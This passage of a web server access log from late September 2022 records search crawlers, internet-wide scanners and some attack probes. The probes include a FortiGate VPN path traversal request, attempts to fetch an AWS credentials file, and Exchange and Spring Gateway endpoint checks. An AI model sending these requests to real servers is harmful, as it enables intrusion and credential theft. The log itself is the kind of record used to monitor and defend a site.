HTTP/1.1" 301 301 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 54.36.148.19 - - [26/Sep/2022:20:52:34 +0200] "GET /robots.txt HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 54.36.149.81 - - [26/Sep/2022:20:52:35 +0200] "GET / HTTP/1.1" 301 297 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 192.241.194.198 - - [26/Sep/2022:22:53:53 +0200] "GET /owa/auth/logon.aspx HTTP/1.1" 301 314 "-" "Mozilla/5.0 zgrab/0.x" 192.241.205.223 - - [26/Sep/2022:22:55:33 +0200] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.208.63 - - [26/Sep/2022:22:57:53 +0200] "GET /owa/auth/x.js HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 152.89.196.23 - - [26/Sep/2022:23:01:00 +0200] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 301 452 "-" "Python-urllib/3.8" 185.83.144.103 - - [26/Sep/2022:23:08:15 +0200] "GET /aws.credentials HTTP/1.1" 301 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.83.144.103 - - [26/Sep/2022:23:08:16 +0200] "POST /aws.credentials HTTP/1.1" 301 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 193.235.141.168 - - [26/Sep/2022:23:23:57 +0200] "GET / HTTP/1.1" 301 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 18.236.203.39 - - [26/Sep/2022:23:28:47 +0200] "GET / HTTP/1.1" 301 307 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 34.222.244.244 - - [26/Sep/2022:23:29:19 +0200] "GET / HTTP/1.1" 301 307 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 54.36.149.3 - - [26/Sep/2022:23:35:13 +0200] "GET /robots.txt HTTP/1.1" 301 302 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 54.36.148.7 - - [26/Sep/2022:23:35:13 +0200] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 152.89.196.211 - - [26/Sep/2022:23:36:40 +0200] "GET /actuator/gateway/routes HTTP/1.1" 301 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 43.129.219.189 - - [27/Sep/2022:00:48:12 +0200] "GET / HTTP/1.1" 301 301 "-" "'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0'" 34.76.158.233 - - [27/Sep/2022:00:52:34 +0200] "GET / HTTP/1.1" 301 301 "-" "python-requests/2.28.1" 128.14.134.134 - - [27/Sep/2022:01:37:23 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 128.14.134.134 - - [27/Sep/2022:01:37:38 +0200] "GET /webfig/ HTTP/1.1" 301 307 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 198.235.24.15 - - [27/Sep/2022:01:53:37 +0200] "GET / HTTP/1.1" 301 393 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"